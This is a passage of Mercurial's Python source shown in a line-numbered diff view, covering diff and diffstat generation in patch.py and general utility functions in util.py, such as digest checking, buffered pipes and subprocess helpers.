2602 2602 return buff
2603 2603
2604 2604 def diffui(*args, **kw):
2605 2605 '''like diff(), but yields 2-tuples of (output, label) for ui.write()'''
2606 2606 return difflabel(diff, *args, **kw)
2607 2607
2608 2608 def _filepairs(modified, added, removed, copy, opts):
2609 2609 '''generates tuples (f1, f2, copyop), where f1 is the name of the file
2610 2610 before and f2 is the the name after. For added files, f1 will be None,
2611 2611 and for removed files, f2 will be None. copyop may be set to None, 'copy'
2612 2612 or 'rename' (the latter two only if opts.git is set).'''
2613 2613 gone = set()
2614 2614
2615 2615 copyto = dict([(v, k) for k, v in copy.items()])
2616 2616
2617 2617 addedset, removedset = set(added), set(removed)
2618 2618
2619 2619 for f in sorted(modified + added + removed):
2620 2620 copyop = None
2621 2621 f1, f2 = f, f
2622 2622 if f in addedset:
2623 2623 f1 = None
2624 2624 if f in copy:
2625 2625 if opts.git:
2626 2626 f1 = copy[f]
2627 2627 if f1 in removedset and f1 not in gone:
2628 2628 copyop = 'rename'
2629 2629 gone.add(f1)
2630 2630 else:
2631 2631 copyop = 'copy'
2632 2632 elif f in removedset:
2633 2633 f2 = None
2634 2634 if opts.git:
2635 2635 # have we already reported a copy above?
2636 2636 if (f in copyto and copyto[f] in addedset
2637 2637 and copy[copyto[f]] == f):
2638 2638 continue
2639 2639 yield f1, f2, copyop
2640 2640
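# Sketch (illustrative): with git diffs enabled and copy = {'b': 'a'},
# where 'a' was removed and 'b' added, the pair is reported once as a
# rename rather than as an add plus a remove (gitopts stands for any
# diffopts with git=True):
#
#   list(_filepairs([], ['b'], ['a'], {'b': 'a'}, gitopts))
#   # -> [('a', 'b', 'rename')]
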
2641 2641 def trydiff(repo, revs, ctx1, ctx2, modified, added, removed,
2642 2642 copy, getfilectx, opts, losedatafn, prefix, relroot):
2643 2643 '''given input data, generate a diff and yield it in blocks
2644 2644
2645 2645 If generating a diff would lose data like flags or binary data and
2646 2646 losedatafn is not None, it will be called.
2647 2647
2648 2648 relroot is removed and prefix is added to every path in the diff output.
2649 2649
2650 2650 If relroot is not empty, this function expects every path in modified,
2651 2651 added, removed and copy to start with it.'''
2652 2652
2653 2653 def gitindex(text):
2654 2654 if not text:
2655 2655 text = ""
2656 2656 l = len(text)
2657 2657 s = hashlib.sha1('blob %d\0' % l)
2658 2658 s.update(text)
2659 2659 return hex(s.digest())
2660 2660
2661 2661 if opts.noprefix:
2662 2662 aprefix = bprefix = ''
2663 2663 else:
2664 2664 aprefix = 'a/'
2665 2665 bprefix = 'b/'
2666 2666
2667 2667 def diffline(f, revs):
2668 2668 revinfo = ' '.join(["-r %s" % rev for rev in revs])
2669 2669 return 'diff %s %s' % (revinfo, f)
2670 2670
2671 2671 def isempty(fctx):
2672 2672 return fctx is None or fctx.size() == 0
2673 2673
2674 2674 date1 = dateutil.datestr(ctx1.date())
2675 2675 date2 = dateutil.datestr(ctx2.date())
2676 2676
2677 2677 gitmode = {'l': '120000', 'x': '100755', '': '100644'}
2678 2678
2679 2679 if relroot != '' and (repo.ui.configbool('devel', 'all-warnings')
2680 2680 or repo.ui.configbool('devel', 'check-relroot')):
2681 2681 for f in modified + added + removed + list(copy) + list(copy.values()):
2682 2682 if f is not None and not f.startswith(relroot):
2683 2683 raise AssertionError(
2684 2684 "file %s doesn't start with relroot %s" % (f, relroot))
2685 2685
2686 2686 for f1, f2, copyop in _filepairs(modified, added, removed, copy, opts):
2687 2687 content1 = None
2688 2688 content2 = None
2689 2689 fctx1 = None
2690 2690 fctx2 = None
2691 2691 flag1 = None
2692 2692 flag2 = None
2693 2693 if f1:
2694 2694 fctx1 = getfilectx(f1, ctx1)
2695 2695 if opts.git or losedatafn:
2696 2696 flag1 = ctx1.flags(f1)
2697 2697 if f2:
2698 2698 fctx2 = getfilectx(f2, ctx2)
2699 2699 if opts.git or losedatafn:
2700 2700 flag2 = ctx2.flags(f2)
2701 2701 # if binary is True, output "summary" or "base85", but not "text diff"
2702 2702 if opts.text:
2703 2703 binary = False
2704 2704 else:
2705 2705 binary = any(f.isbinary() for f in [fctx1, fctx2] if f is not None)
2706 2706
2707 2707 if losedatafn and not opts.git:
2708 2708 if (binary or
2709 2709 # copy/rename
2710 2710 f2 in copy or
2711 2711 # empty file creation
2712 2712 (not f1 and isempty(fctx2)) or
2713 2713 # empty file deletion
2714 2714 (isempty(fctx1) and not f2) or
2715 2715 # create with flags
2716 2716 (not f1 and flag2) or
2717 2717 # change flags
2718 2718 (f1 and f2 and flag1 != flag2)):
2719 2719 losedatafn(f2 or f1)
2720 2720
2721 2721 path1 = f1 or f2
2722 2722 path2 = f2 or f1
2723 2723 path1 = posixpath.join(prefix, path1[len(relroot):])
2724 2724 path2 = posixpath.join(prefix, path2[len(relroot):])
2725 2725 header = []
2726 2726 if opts.git:
2727 2727 header.append('diff --git %s%s %s%s' %
2728 2728 (aprefix, path1, bprefix, path2))
2729 2729 if not f1: # added
2730 2730 header.append('new file mode %s' % gitmode[flag2])
2731 2731 elif not f2: # removed
2732 2732 header.append('deleted file mode %s' % gitmode[flag1])
2733 2733 else: # modified/copied/renamed
2734 2734 mode1, mode2 = gitmode[flag1], gitmode[flag2]
2735 2735 if mode1 != mode2:
2736 2736 header.append('old mode %s' % mode1)
2737 2737 header.append('new mode %s' % mode2)
2738 2738 if copyop is not None:
2739 2739 if opts.showsimilarity:
2740 2740 sim = similar.score(ctx1[path1], ctx2[path2]) * 100
2741 2741 header.append('similarity index %d%%' % sim)
2742 2742 header.append('%s from %s' % (copyop, path1))
2743 2743 header.append('%s to %s' % (copyop, path2))
2744 2744 elif revs and not repo.ui.quiet:
2745 2745 header.append(diffline(path1, revs))
2746 2746
2747 2747 # fctx.is | diffopts | what to | is fctx.data()
2748 2748 # binary() | text nobinary git index | output? | outputted?
2749 2749 # ------------------------------------|----------------------------
2750 2750 # yes | no no no * | summary | no
2751 2751 # yes | no no yes * | base85 | yes
2752 2752 # yes | no yes no * | summary | no
2753 2753 # yes | no yes yes 0 | summary | no
2754 2754 # yes | no yes yes >0 | summary | semi [1]
2755 2755 # yes | yes * * * | text diff | yes
2756 2756 # no | * * * * | text diff | yes
2757 2757 # [1]: hash(fctx.data()) is outputted, so fctx.data() cannot be faked
2758 2758 if binary and (not opts.git or (opts.git and opts.nobinary and not
2759 2759 opts.index)):
2760 2760 # fast path: no binary content will be displayed, content1 and
2761 2761 # content2 are only used for equivalent test. cmp() could have a
2762 2762 # fast path.
2763 2763 if fctx1 is not None:
2764 2764 content1 = b'\0'
2765 2765 if fctx2 is not None:
2766 2766 if fctx1 is not None and not fctx1.cmp(fctx2):
2767 2767 content2 = b'\0' # not different
2768 2768 else:
2769 2769 content2 = b'\0\0'
2770 2770 else:
2771 2771 # normal path: load contents
2772 2772 if fctx1 is not None:
2773 2773 content1 = fctx1.data()
2774 2774 if fctx2 is not None:
2775 2775 content2 = fctx2.data()
2776 2776
2777 2777 if binary and opts.git and not opts.nobinary:
2778 2778 text = mdiff.b85diff(content1, content2)
2779 2779 if text:
2780 2780 header.append('index %s..%s' %
2781 2781 (gitindex(content1), gitindex(content2)))
2782 2782 hunks = (None, [text]),
2783 2783 else:
2784 2784 if opts.git and opts.index > 0:
2785 2785 flag = flag1
2786 2786 if flag is None:
2787 2787 flag = flag2
2788 2788 header.append('index %s..%s %s' %
2789 2789 (gitindex(content1)[0:opts.index],
2790 2790 gitindex(content2)[0:opts.index],
2791 2791 gitmode[flag]))
2792 2792
2793 2793 uheaders, hunks = mdiff.unidiff(content1, date1,
2794 2794 content2, date2,
2795 2795 path1, path2,
2796 2796 binary=binary, opts=opts)
2797 2797 header.extend(uheaders)
2798 2798 yield fctx1, fctx2, header, hunks
2799 2799
2800 2800 def diffstatsum(stats):
2801 2801 maxfile, maxtotal, addtotal, removetotal, binary = 0, 0, 0, 0, False
2802 2802 for f, a, r, b in stats:
2803 2803 maxfile = max(maxfile, encoding.colwidth(f))
2804 2804 maxtotal = max(maxtotal, a + r)
2805 2805 addtotal += a
2806 2806 removetotal += r
2807 2807 binary = binary or b
2808 2808
2809 2809 return maxfile, maxtotal, addtotal, removetotal, binary
2810 2810
2811 2811 def diffstatdata(lines):
2812 2812 diffre = re.compile(br'^diff .*-r [a-z0-9]+\s(.*)$')
2813 2813
2814 2814 results = []
2815 2815 filename, adds, removes, isbinary = None, 0, 0, False
2816 2816
2817 2817 def addresult():
2818 2818 if filename:
2819 2819 results.append((filename, adds, removes, isbinary))
2820 2820
2821 2821 # inheader is used to track if a line is in the
2822 2822 # header portion of the diff. This helps properly account
2823 2823 # for lines that start with '--' or '++'
2824 2824 inheader = False
2825 2825
2826 2826 for line in lines:
2827 2827 if line.startswith('diff'):
2828 2828 addresult()
2829 2829 # starting a new file diff
2830 2830 # set numbers to 0 and reset inheader
2831 2831 inheader = True
2832 2832 adds, removes, isbinary = 0, 0, False
2833 2833 if line.startswith('diff --git a/'):
2834 2834 filename = gitre.search(line).group(2)
2835 2835 elif line.startswith('diff -r'):
2836 2836 # format: "diff -r ... -r ... filename"
2837 2837 filename = diffre.search(line).group(1)
2838 2838 elif line.startswith('@@'):
2839 2839 inheader = False
2840 2840 elif line.startswith('+') and not inheader:
2841 2841 adds += 1
2842 2842 elif line.startswith('-') and not inheader:
2843 2843 removes += 1
2844 2844 elif (line.startswith('GIT binary patch') or
2845 2845 line.startswith('Binary file')):
2846 2846 isbinary = True
2847 2847 addresult()
2848 2848 return results
2849 2849
2850 2850 def diffstat(lines, width=80):
2851 2851 output = []
2852 2852 stats = diffstatdata(lines)
2853 2853 maxname, maxtotal, totaladds, totalremoves, hasbinary = diffstatsum(stats)
2854 2854
2855 2855 countwidth = len(str(maxtotal))
2856 2856 if hasbinary and countwidth < 3:
2857 2857 countwidth = 3
2858 2858 graphwidth = width - countwidth - maxname - 6
2859 2859 if graphwidth < 10:
2860 2860 graphwidth = 10
2861 2861
2862 2862 def scale(i):
2863 2863 if maxtotal <= graphwidth:
2864 2864 return i
2865 2865 # If diffstat runs out of room it doesn't print anything,
2866 2866 # which isn't very useful, so always print at least one + or -
2867 2867 # if there were at least some changes.
2868 2868 return max(i * graphwidth // maxtotal, int(bool(i)))
2869 2869
2870 2870 for filename, adds, removes, isbinary in stats:
2871 2871 if isbinary:
2872 2872 count = 'Bin'
2873 2873 else:
2874 2874 count = '%d' % (adds + removes)
2875 2875 pluses = '+' * scale(adds)
2876 2876 minuses = '-' * scale(removes)
2877 2877 output.append(' %s%s | %*s %s%s\n' %
2878 2878 (filename, ' ' * (maxname - encoding.colwidth(filename)),
2879 2879 countwidth, count, pluses, minuses))
2880 2880
2881 2881 if stats:
2882 2882 output.append(_(' %d files changed, %d insertions(+), '
2883 2883 '%d deletions(-)\n')
2884 2884 % (len(stats), totaladds, totalremoves))
2885 2885
2886 2886 return ''.join(output)
2887 2887
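# Example output (illustrative, for a file with 7 additions and 5
# removals; note the code does not singularize "files changed"):
#
#    mercurial/patch.py | 12 +++++++-----
#    1 files changed, 7 insertions(+), 5 deletions(-)
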
2888 2888 def diffstatui(*args, **kw):
2889 2889 '''like diffstat(), but yields 2-tuples of (output, label) for
2890 2890 ui.write()
2891 2891 '''
2892 2892
2893 2893 for line in diffstat(*args, **kw).splitlines():
2894 2894 if line and line[-1] in '+-':
2895 2895 name, graph = line.rsplit(' ', 1)
2896 2896 yield (name + ' ', '')
2897 2897 m = re.search(br'\++', graph)
2898 2898 if m:
2899 2899 yield (m.group(0), 'diffstat.inserted')
2900 2900 m = re.search(br'-+', graph)
2901 2901 if m:
2902 2902 yield (m.group(0), 'diffstat.deleted')
2903 2903 else:
2904 2904 yield (line, '')
2905 2905 yield ('\n', '')
@@ -1,4066 +1,4087 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 shellsplit = platform.shellsplit
151 151 spawndetached = platform.spawndetached
152 152 split = platform.split
153 153 sshargs = platform.sshargs
154 154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 155 statisexec = platform.statisexec
156 156 statislink = platform.statislink
157 157 testpid = platform.testpid
158 158 umask = platform.umask
159 159 unlink = platform.unlink
160 160 username = platform.username
161 161
162 162 try:
163 163 recvfds = osutil.recvfds
164 164 except AttributeError:
165 165 pass
166 166 try:
167 167 setprocname = osutil.setprocname
168 168 except AttributeError:
169 169 pass
170 170 try:
171 171 unblocksignal = osutil.unblocksignal
172 172 except AttributeError:
173 173 pass
174 174
175 175 # Python compatibility
176 176
177 177 _notset = object()
178 178
179 179 def safehasattr(thing, attr):
180 180 return getattr(thing, attr, _notset) is not _notset
181 181
182 182 def _rapply(f, xs):
183 183 if xs is None:
184 184 # assume None means the absence of an optional value
185 185 return xs
186 186 if isinstance(xs, (list, set, tuple)):
187 187 return type(xs)(_rapply(f, x) for x in xs)
188 188 if isinstance(xs, dict):
189 189 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 190 return f(xs)
191 191
192 192 def rapply(f, xs):
193 193 """Apply function recursively to every item preserving the data structure
194 194
195 195 >>> def f(x):
196 196 ... return 'f(%s)' % x
197 197 >>> rapply(f, None) is None
198 198 True
199 199 >>> rapply(f, 'a')
200 200 'f(a)'
201 201 >>> rapply(f, {'a'}) == {'f(a)'}
202 202 True
203 203 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
204 204 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
205 205
206 206 >>> xs = [object()]
207 207 >>> rapply(pycompat.identity, xs) is xs
208 208 True
209 209 """
210 210 if f is pycompat.identity:
211 211 # fast path mainly for py2
212 212 return xs
213 213 return _rapply(f, xs)
214 214
215 215 def bitsfrom(container):
216 216 bits = 0
217 217 for bit in container:
218 218 bits |= bit
219 219 return bits
220 220
221 221 # Python 2.6 still has deprecation warnings enabled by default. We do not want
222 222 # to display anything to the standard user, so detect whether we are running
223 223 # tests and only use Python deprecation warnings in that case.
224 224 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
225 225 if _dowarn:
226 226 # explicitly unfilter our warning for python 2.7
227 227 #
228 228 # The option of setting PYTHONWARNINGS in the test runner was investigated.
229 229 # However, the module name set through PYTHONWARNINGS was matched exactly, so
230 230 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
231 231 # makes the whole PYTHONWARNINGS thing useless for our use case.
232 232 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
233 233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
235 235 if _dowarn and pycompat.ispy3:
236 236 # silence warning emitted by passing user string to re.sub()
237 237 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
238 238 r'mercurial')
239 239 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
240 240 DeprecationWarning, r'mercurial')
241 241
242 242 def nouideprecwarn(msg, version, stacklevel=1):
243 243 """Issue an python native deprecation warning
244 244
245 245 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
246 246 """
247 247 if _dowarn:
248 248 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
249 249 " update your code.)") % version
250 250 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
251 251
252 252 DIGESTS = {
253 253 'md5': hashlib.md5,
254 254 'sha1': hashlib.sha1,
255 255 'sha512': hashlib.sha512,
256 256 }
257 257 # List of digest types from strongest to weakest
258 258 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
259 259
260 260 for k in DIGESTS_BY_STRENGTH:
261 261 assert k in DIGESTS
262 262
263 263 class digester(object):
264 264 """helper to compute digests.
265 265
266 266 This helper can be used to compute one or more digests given their name.
267 267
268 268 >>> d = digester([b'md5', b'sha1'])
269 269 >>> d.update(b'foo')
270 270 >>> [k for k in sorted(d)]
271 271 ['md5', 'sha1']
272 272 >>> d[b'md5']
273 273 'acbd18db4cc2f85cedef654fccc4a4d8'
274 274 >>> d[b'sha1']
275 275 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
276 276 >>> digester.preferred([b'md5', b'sha1'])
277 277 'sha1'
278 278 """
279 279
280 280 def __init__(self, digests, s=''):
281 281 self._hashes = {}
282 282 for k in digests:
283 283 if k not in DIGESTS:
284 284 raise Abort(_('unknown digest type: %s') % k)
285 285 self._hashes[k] = DIGESTS[k]()
286 286 if s:
287 287 self.update(s)
288 288
289 289 def update(self, data):
290 290 for h in self._hashes.values():
291 291 h.update(data)
292 292
293 293 def __getitem__(self, key):
294 294 if key not in DIGESTS:
295 295 raise Abort(_('unknown digest type: %s') % key)
296 296 return nodemod.hex(self._hashes[key].digest())
297 297
298 298 def __iter__(self):
299 299 return iter(self._hashes)
300 300
301 301 @staticmethod
302 302 def preferred(supported):
303 303 """returns the strongest digest type in both supported and DIGESTS."""
304 304
305 305 for k in DIGESTS_BY_STRENGTH:
306 306 if k in supported:
307 307 return k
308 308 return None
309 309
310 310 class digestchecker(object):
311 311 """file handle wrapper that additionally checks content against a given
312 312 size and digests.
313 313
314 314 d = digestchecker(fh, size, {'md5': '...'})
315 315
316 316 When multiple digests are given, all of them are validated.
317 317 """
318 318
319 319 def __init__(self, fh, size, digests):
320 320 self._fh = fh
321 321 self._size = size
322 322 self._got = 0
323 323 self._digests = dict(digests)
324 324 self._digester = digester(self._digests.keys())
325 325
326 326 def read(self, length=-1):
327 327 content = self._fh.read(length)
328 328 self._digester.update(content)
329 329 self._got += len(content)
330 330 return content
331 331
332 332 def validate(self):
333 333 if self._size != self._got:
334 334 raise Abort(_('size mismatch: expected %d, got %d') %
335 335 (self._size, self._got))
336 336 for k, v in self._digests.items():
337 337 if v != self._digester[k]:
338 338 # i18n: first parameter is a digest name
339 339 raise Abort(_('%s mismatch: expected %s, got %s') %
340 340 (k, v, self._digester[k]))
341 341
342 342 try:
343 343 buffer = buffer
344 344 except NameError:
345 345 def buffer(sliceable, offset=0, length=None):
346 346 if length is not None:
347 347 return memoryview(sliceable)[offset:offset + length]
348 348 return memoryview(sliceable)[offset:]
349 349
350 350 closefds = pycompat.isposix
351 351
352 352 _chunksize = 4096
353 353
354 354 class bufferedinputpipe(object):
355 355 """a manually buffered input pipe
356 356
357 357 Python will not let us use buffered IO and lazy reading with 'polling' at
358 358 the same time. We cannot probe the buffer state and select will not detect
359 359 that data are ready to read if they are already buffered.
360 360
361 361 This class lets us work around that by implementing its own buffering
362 362 (allowing efficient readline) while offering a way to know if the buffer is
363 363 empty from the output (allowing collaboration of the buffer with polling).
364 364
365 365 This class lives in the 'util' module because it makes use of the 'os'
366 366 module from the python stdlib.
367 367 """
368 368 def __new__(cls, fh):
369 369 # If we receive a fileobjectproxy, we need to use a variation of this
370 370 # class that notifies observers about activity.
371 371 if isinstance(fh, fileobjectproxy):
372 372 cls = observedbufferedinputpipe
373 373
374 374 return super(bufferedinputpipe, cls).__new__(cls)
375 375
376 376 def __init__(self, input):
377 377 self._input = input
378 378 self._buffer = []
379 379 self._eof = False
380 380 self._lenbuf = 0
381 381
382 382 @property
383 383 def hasbuffer(self):
384 384 """True is any data is currently buffered
385 385
386 386 This will be used externally a pre-step for polling IO. If there is
387 387 already data then no polling should be set in place."""
388 388 return bool(self._buffer)
389 389
390 390 @property
391 391 def closed(self):
392 392 return self._input.closed
393 393
394 394 def fileno(self):
395 395 return self._input.fileno()
396 396
397 397 def close(self):
398 398 return self._input.close()
399 399
400 400 def read(self, size):
401 401 while (not self._eof) and (self._lenbuf < size):
402 402 self._fillbuffer()
403 403 return self._frombuffer(size)
404 404
405 405 def readline(self, *args, **kwargs):
406 406 if 1 < len(self._buffer):
407 407             # this should not happen because both read and readline end with a
408 408             # _frombuffer call that collapses it.
409 409 self._buffer = [''.join(self._buffer)]
410 410 self._lenbuf = len(self._buffer[0])
411 411 lfi = -1
412 412 if self._buffer:
413 413 lfi = self._buffer[-1].find('\n')
414 414 while (not self._eof) and lfi < 0:
415 415 self._fillbuffer()
416 416 if self._buffer:
417 417 lfi = self._buffer[-1].find('\n')
418 418 size = lfi + 1
419 419 if lfi < 0: # end of file
420 420 size = self._lenbuf
421 421 elif 1 < len(self._buffer):
422 422 # we need to take previous chunks into account
423 423 size += self._lenbuf - len(self._buffer[-1])
424 424 return self._frombuffer(size)
425 425
426 426 def _frombuffer(self, size):
427 427 """return at most 'size' data from the buffer
428 428
429 429 The data are removed from the buffer."""
430 430 if size == 0 or not self._buffer:
431 431 return ''
432 432 buf = self._buffer[0]
433 433 if 1 < len(self._buffer):
434 434 buf = ''.join(self._buffer)
435 435
436 436 data = buf[:size]
437 437 buf = buf[len(data):]
438 438 if buf:
439 439 self._buffer = [buf]
440 440 self._lenbuf = len(buf)
441 441 else:
442 442 self._buffer = []
443 443 self._lenbuf = 0
444 444 return data
445 445
446 446 def _fillbuffer(self):
447 447 """read data to the buffer"""
448 448 data = os.read(self._input.fileno(), _chunksize)
449 449 if not data:
450 450 self._eof = True
451 451 else:
452 452 self._lenbuf += len(data)
453 453 self._buffer.append(data)
454 454
455 455 return data
456 456
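# Editor's note: illustrative sketch, not part of the original source;
# 'proc' stands for a hypothetical subprocess whose stdout is a pipe.
def _example_bufferedinputpipe(proc, timeout=1.0):
    import select
    pipe = bufferedinputpipe(proc.stdout)
    lines = []
    while True:
        # only poll when our own buffer is empty; select() cannot see
        # data that this class has already buffered
        if pipe.hasbuffer or select.select([pipe], [], [], timeout)[0]:
            line = pipe.readline()
            if not line:
                break
            lines.append(line)
    return lines
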
457 457 def mmapread(fp):
458 458 try:
459 459 fd = getattr(fp, 'fileno', lambda: fp)()
460 460 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
461 461 except ValueError:
462 462 # Empty files cannot be mmapped, but mmapread should still work. Check
463 463 # if the file is empty, and if so, return an empty buffer.
464 464 if os.fstat(fd).st_size == 0:
465 465 return ''
466 466 raise
467 467
468 468 def popen2(cmd, env=None, newlines=False):
469 469 # Setting bufsize to -1 lets the system decide the buffer size.
470 470 # The default for bufsize is 0, meaning unbuffered. This leads to
471 471 # poor performance on Mac OS X: http://bugs.python.org/issue4194
472 472 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
473 473 close_fds=closefds,
474 474 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
475 475 universal_newlines=newlines,
476 476 env=env)
477 477 return p.stdin, p.stdout
478 478
479 479 def popen3(cmd, env=None, newlines=False):
480 480 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
481 481 return stdin, stdout, stderr
482 482
483 483 def popen4(cmd, env=None, newlines=False, bufsize=-1):
484 484 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
485 485 close_fds=closefds,
486 486 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
487 487 stderr=subprocess.PIPE,
488 488 universal_newlines=newlines,
489 489 env=env)
490 490 return p.stdin, p.stdout, p.stderr, p
491 491
492 492 class fileobjectproxy(object):
493 493 """A proxy around file objects that tells a watcher when events occur.
494 494
495 495 This type is intended to only be used for testing purposes. Think hard
496 496 before using it in important code.
497 497 """
498 498 __slots__ = (
499 499 r'_orig',
500 500 r'_observer',
501 501 )
502 502
503 503 def __init__(self, fh, observer):
504 504 object.__setattr__(self, r'_orig', fh)
505 505 object.__setattr__(self, r'_observer', observer)
506 506
507 507 def __getattribute__(self, name):
508 508 ours = {
509 509 r'_observer',
510 510
511 511 # IOBase
512 512 r'close',
513 513 # closed if a property
514 514 r'fileno',
515 515 r'flush',
516 516 r'isatty',
517 517 r'readable',
518 518 r'readline',
519 519 r'readlines',
520 520 r'seek',
521 521 r'seekable',
522 522 r'tell',
523 523 r'truncate',
524 524 r'writable',
525 525 r'writelines',
526 526 # RawIOBase
527 527 r'read',
528 528 r'readall',
529 529 r'readinto',
530 530 r'write',
531 531 # BufferedIOBase
532 532 # raw is a property
533 533 r'detach',
534 534 # read defined above
535 535 r'read1',
536 536 # readinto defined above
537 537 # write defined above
538 538 }
539 539
540 540 # We only observe some methods.
541 541 if name in ours:
542 542 return object.__getattribute__(self, name)
543 543
544 544 return getattr(object.__getattribute__(self, r'_orig'), name)
545 545
546 546 def __nonzero__(self):
547 547 return bool(object.__getattribute__(self, r'_orig'))
548 548
549 549 __bool__ = __nonzero__
550 550
551 551 def __delattr__(self, name):
552 552 return delattr(object.__getattribute__(self, r'_orig'), name)
553 553
554 554 def __setattr__(self, name, value):
555 555 return setattr(object.__getattribute__(self, r'_orig'), name, value)
556 556
557 557 def __iter__(self):
558 558 return object.__getattribute__(self, r'_orig').__iter__()
559 559
560 560 def _observedcall(self, name, *args, **kwargs):
561 561 # Call the original object.
562 562 orig = object.__getattribute__(self, r'_orig')
563 563 res = getattr(orig, name)(*args, **kwargs)
564 564
565 565 # Call a method on the observer of the same name with arguments
566 566 # so it can react, log, etc.
567 567 observer = object.__getattribute__(self, r'_observer')
568 568 fn = getattr(observer, name, None)
569 569 if fn:
570 570 fn(res, *args, **kwargs)
571 571
572 572 return res
573 573
574 574 def close(self, *args, **kwargs):
575 575 return object.__getattribute__(self, r'_observedcall')(
576 576 r'close', *args, **kwargs)
577 577
578 578 def fileno(self, *args, **kwargs):
579 579 return object.__getattribute__(self, r'_observedcall')(
580 580 r'fileno', *args, **kwargs)
581 581
582 582 def flush(self, *args, **kwargs):
583 583 return object.__getattribute__(self, r'_observedcall')(
584 584 r'flush', *args, **kwargs)
585 585
586 586 def isatty(self, *args, **kwargs):
587 587 return object.__getattribute__(self, r'_observedcall')(
588 588 r'isatty', *args, **kwargs)
589 589
590 590 def readable(self, *args, **kwargs):
591 591 return object.__getattribute__(self, r'_observedcall')(
